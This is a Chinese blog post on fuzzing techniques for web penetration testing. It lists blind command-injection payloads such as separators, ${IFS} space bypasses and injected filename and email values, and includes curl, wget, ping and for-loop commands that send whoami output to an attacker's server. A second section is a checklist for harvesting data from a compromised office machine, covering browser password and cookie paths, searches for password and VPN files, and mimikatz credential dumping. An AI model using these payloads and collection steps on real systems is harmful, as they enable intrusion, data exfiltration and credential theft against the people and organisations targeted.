「Fuzz」:浅谈一些模糊匹配搜集信息的技巧

最新推荐文章于 2022-11-20 21:40:08 发布
最新推荐文章于 2022-11-20 21:40:08 发布
阅读量789 收藏 1
点赞数
文章标签: linux
原文链接:https://github.com/LandGrey/SpringBootVulExploit
版权

写在文前:

我们在web攻防期间有很多时候有一种感觉:那就是遇到rce漏洞时,bp放包的时候有一种隐隐的感觉,有的时候bp的反包字节大小莫名其妙的怪异,有经验的老师傅就索性直接跑RCE的fuzz字典,所以本篇就日常记录一些有关于web攻防期间的一些fuzz技巧

服务器RCE的fuzz技巧

  • Windows机器的fuzz

即我们可以在关键参数后面使用管道符号和连接符fuzz命令执行实现我们的盲打:

||和&

  • linux机器的fuzz

同上

||和&

  • Linux下过滤空格可以使用:
${IFS},$IFS,$IFS$9
  • JSON格式下的测试:
\u000awget\u0020 http://ip

Linux下可以包括反引号,windows下不可以。

Linux下正常测试rce:

服务器启动web,注意需要处于监听状态下启动:

bin4xin@bin4xin's MacbookPro tools % python3 -m http.server
Serving HTTP on :: port 8000 (http://[::]:8000/) ...

rce fuzz命令如下:

bin4xin@bin4xin's MacbookPro tools % curl 192.168.101.51:8000/`whoami`

同时我们反过来看web日志记录:

::ffff:192.168.101.51 - - [19/Sep/2020 13:57:25] "GET /bin4xin HTTP/1.1" 301 -

同理各位可以发散思维:

ping whoami.服务器地址

如上,ping、curl同样适用。

一些特殊字符绕过姿势:

curl http://服务器地址/$(whoami)

curl http://服务器地址/$(whoami|base64)

'w'g'e't${IFS}服务器地址

各位可以自行实验在linux下的效果。

Windows探测:

fuzz技巧是一样的,只是fuzz命令有一些区别;

ping %USERNAME%.服务器地址
------
(获取计算机名)
for /F %x in ('whoami') do start http://服务器地址/%x
------
(获取用户名称)
for /F "delims=\ tokens=2" %i in ('whoami') do ping -n 1 %i.服务器地址
------
测试邮箱:`wget%209服务器地址/xxxx`@qq.com

测试上传:`sleep 10`filename

测试filenname:`||wget%20服务器地址`

测试上传处下的名称: ;payload|payload&payload
;whoami|whoami&whoami
------

个人机器信息收集

  1. 浏览器[Chrome,Firefox,Edge,IE,360,QQ ]信息(历史记录,密码,书签,cookie):
   %LocalAppData%\Google\Chrome\User Data\Default
   %APPDATA%\Mozilla\Firefox\Profiles\xxxxxxxx.default\
  1. 机器内敏感文件,关键词:账号、密码、备份、登录、管理、邮箱、后台、资产、网络
   for /r D:\ %i in (*密码*) do @echo %i
   for /r D:\ %i in (*vpn*) do @echo %i
   for /r D:\ %i in (*账号*) do @echo %i

  1. 机器进程

    • 杀软/edr
    • teamviewer/等远程管理工具
    • 服务类进程:mssql/java/web服务

  2. 安装软件列表

  3. 当前windows 凭证管理器存储的密码

    • 登录密码(mimikatz)

    • wifi密码

    • outlook密码

    • ……

  4. 机器开放端口信息/防火墙信息/获取机器共享

   netstat -naop
   wmic share  get name,path,status  #利用wmic查找共享

  1. 获取机器所有rdp连接记录

  2. 获取所有盘符

wmic logicaldisk where drivetype=3 get name,freespace,systemname,filesystem,volumeserialnumber,size #查看分区
  1. 获取全盘所有敏感文件
    .doc\xlsx\md\sql\ppt*\txt等等文件:
   for /r D:\ %i in (*.doc) do @echo %i
   for /r D:\ %i in (*.xlsx) do @echo %i
   for /r D:\ %i in (*.ppt*)) do @echo %i
  1. 本地环境
  • hosts
  • 环境变量
  • 补丁列表
  • 当前主机的会话信息

部分文章版权来自网络,若原作者介意可联系「chihou.pro@gmail.com」删除。

工作不饱和 总结了一下个人办公机信息收集思路。其实这样的技巧还有很多,本文权当抛砖引玉。

binaxin
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python 模糊匹配ftp文件_使用正则模糊匹配的ftp文件传输
weixin_39766014的博客
12-08 1168
通常而言,FTP传输过程中,客户端在完成账户认证后,需要指定具体的文件路径方能下载或删除服务器端的文件。但是在使用命令行指令去操作ftp数据时,如果每次都要输入完整的路径就太麻烦了,而且如果想要同时下载多个文件还需逐个执行下载指令,那有什么方法可以通过正则表达式去完成模糊匹配和批量下载呢?本文就来介绍一下FTP数据传输的常用操作及正则匹配的实现方法。常用的ftp客户端在介绍ftp数据传输之前,简单...
ElasticSearch
qq_40813329的博客
01-25 1355
ElasticSearch7.6入门学习笔记
Jquery 模糊匹配ID
热门推荐
★昔梦无痕★
03-20 1万+
[属性名称] 匹配包含给定属性的元素 [att=value] 匹配包含给定属性的元素 (大小写区分) [att*=value] 模糊匹配 [att!=value] 不能是这个值 [att$=value] 结尾是这个值 [att^=value] 开头是这个值 [att1][att2][att3]... 匹配多个属性条件中的一个 ===========================
[FUZZ]文件上传fuzz字典生成脚本—使用方法
mingyqf的博客
04-20 2281
[FUZZ]文件上传fuzz字典生成脚本—使用方法 文件上传fuzz字典生成脚本—使用方法 原作者:c0ny1 项目地址:https://github.com/c0ny1/upload-fuzz-dic-builder 项目预览效果图: 帮助手册: 脚本可以自定义生成的上传文件名(-n),允许的上传的后缀(-a),后端语言(-l),中间件(-m),操作系统(–os),是否加入双后缀(-d)以及输出的字典文件名(-o)。 我们可以根据场景的不同,来生成合适的字典,提供的信息越详细,脚本生成的字典越精确!
api-fuzz:python restful api模糊测试
02-05
IntelliFuzzTest cli测试工具安装git clone https://github.com/smasterfree/api-fuzz.gitpip install -r requirements.txt快速开始将curl请求体放进request.txt文件中,执行命令python IntelliFuzzTest_cli.py ...
seneca-fuzz:Seneca 框架的模糊测试插件
06-28
seneca-fuzztester“模糊”测试插件该模块提供了一种对各种插件进行的方法。支持/贡献请使用此 git 存储库的。 将通过拉取请求接受贡献,并在适当时附带问题。示例/用法使用 mocha/chai,可以在找到完整的示例 var ...
cargo-fuzz:用于模糊测试的命令行助手
02-05
cargo-fuzz 是 Rust 生态系统中的一个非常有用的工具,它是一个命令行助手,专门用于进行模糊测试(fuzzing)。模糊测试是一种自动化测试方法,通过大量随机输入来寻找软件中的漏洞和不稳定点。在 Rust 语言中,由于...
oss-fuzz:OSS-Fuzz-开源软件的连续模糊测试
02-05
OSS-Fuzz:开源软件的连续模糊测试 是一种用于发现软件编程错误的众所周知的技术。 其中许多可检测到的错误(例如)可能会带来严重的安全隐患。 通过部署 Google已经发现了的安全漏洞和稳定性错误,我们现在希望与...
Yuan-fuzz:用生成的参数模糊
03-16
模糊Fuzzer使用argv信息运行,并使用k-means聚类对种子进行分组。 Written and maintained by zodf0055980 <zodf0055980> Based on American Fuzzy Lop by Michal Zalewski技术Yuan-fuzz是一种模糊器,它在名为arg...
FUZZ入门1
weixin_61283545的博客
05-27 2615
AFL-Fuzz介绍 Fuzzing是指通过构造测试输入,对软件进行大量测试来发现软件中的漏洞的一种模糊测试方法。在CTF中,fuzzing可能不常用,但在现实的漏洞挖掘中,fuzzing因其简单高效的优势,成为非常主流的漏洞挖掘方法。 AFL则是fuzzing的一个很好用的工具,全称是American Fuzzy Lop,由Google安全工程师Michał Zalewski开发的一款开源fuzzing测试工具,可以高效地对二进制程序进行fuzzing,挖掘可能存在的内存安全漏洞,如栈溢出、堆溢出、U
ctfshow--RCE极限挑战
最新发布
bossDDYY的博客
11-20 1647
使用A的话构造GET肯定是无法小于105 那么可以尝试构造POST。phpinfo安装了一个扩展gettext,该扩展支持函数。,我们可以利用反引号执行命令 echo输出。我们跑一下 看看哪些字符没有被过滤。要保证构造payload长度小于。限制字符的自增 对于我来说较难。fuzz测试哪些字符没有被过滤。另外更有大佬的payload。fuzz测试什么没有被过滤。限制传入的参数长度小于等于。fuzz测试,可用字符。构造的payload。
SQL注入常见的攻击方法(一)
ThegreatHaige的博客
10-22 3964
sql注入 一.基本概述及分析 定义:SQL 注入(SQL Injection)是发生在 Web 程序中数据库层的安全漏洞,是网站存在最多也是最简单的漏洞。主要原因是程序对用户输入数据的合法性没有判断和处理,导致攻击者可以在 Web 应用程序中事先定义好的 SQL 语句中添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步获取到数据信息。 利用条件分析: 可控参数 参数与数据库之间具有传入 回显 <?php header("Con
在三星Android手机上从Fuzzing漏洞挖掘到RCE漏洞利用
systemino的博客
05-21 1099
我们进行了一些在三星Android手机上的安全性研究,这些研究证明了通过发送无用户交互的mms,可以从Fuzzing模糊测试到实现远程代码执行利用。 Google的Project Zero致力于挖掘0-day漏洞并破解各种产品,他们已经在三星的Android Skia图像处理库中发现一些堆溢出问题。 此漏洞由团队成员Mateusz Jurczyk发现的。此漏洞使恶意MMS能够触发远程代码执行,该漏洞是在图像处理中发生的,图像处理是在收到短信并且由Android的Skia库处理图像而没有用户交互时发生的。
Byte CTF boring_code(fuzz,无参数RCE)
a3320315的博客
11-09 1894
0x01 贴出代码 <?php function is_valid_url($url) { if (filter_var($url, FILTER_VALIDATE_URL)) { if (preg_match('/data:\/\//i', $url)) { return false; } return true; } return false; } if (is...
模糊测试
steven_chr的专栏
11-10 1234
模糊测试(Fuzz testing )是一项对代码质量有着深远影响的简单技术。在本文中,Elliotte Rusty Harold 故意将随机的坏数据插入应用程序,以观察发生的结果。他也解释了如何使用如校验和、XML 数据存储及代码验证等防护性编码技术,来加固您的程序以抵制随机数据。他以一个练习进行总结,在练习中他以一个代码破坏者的角度进行思考 —— 这是一种用于防护代码的至关重要的技术。多年
从SQL注入绕过最新安全狗WAF中学习fuzz
quan9i的博客
06-11 994
声明:文章首发于先知社区
FUZZ测试某狗WAF绕过
JBlock的博客
03-17 6500
题记 Fuzz是安全测试的一种方法,也是极为重要的一种手段!当你面对waf无所适从的时候,这时候你就可以Fuzz模糊测试来绕过waf,甚至你可以发现一些意想不到的姿势!最近两天我会对fuzz测试进行介绍!主要内容是Fuzz脚本编写和Fuzz思路!如果你想,这里会有无数种姿势让你bypass! 文章目录题记正文环境准备FUZZ思路后记 正文 环境准备 测试靶场:sql-libs 安全软件:某狗最新版...
linux修改/etc/hosts
系统运维
12-27 1981
hosts文件 hosts —— the static table lookup for host name(主机名查询静态表) hosts文件是Linux系统上一个负责ip地址与域名快速解析的文件,以ascii格式保存在/etc/目录下。hosts文件包含了ip地址与主机名之间的映射,还包括主机的别名。在没有域名解析服务器的情况下,系统上的所有网络程序都通过查询该文件来解析对应于某个主机...
OSS-Fuzz:容器和云计算在模糊测试中的应用 - Hanhan1
08-03
OSS-Fuzz 是一个基于云计算和容器技术的模糊测试工具,可以帮助开发者发现和修复开源软件的严重漏洞。模糊测试是一种自动化软件测试方法,通过向软件输入随机或不合法的数据,以及执行各种异常操作,来检测软件的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值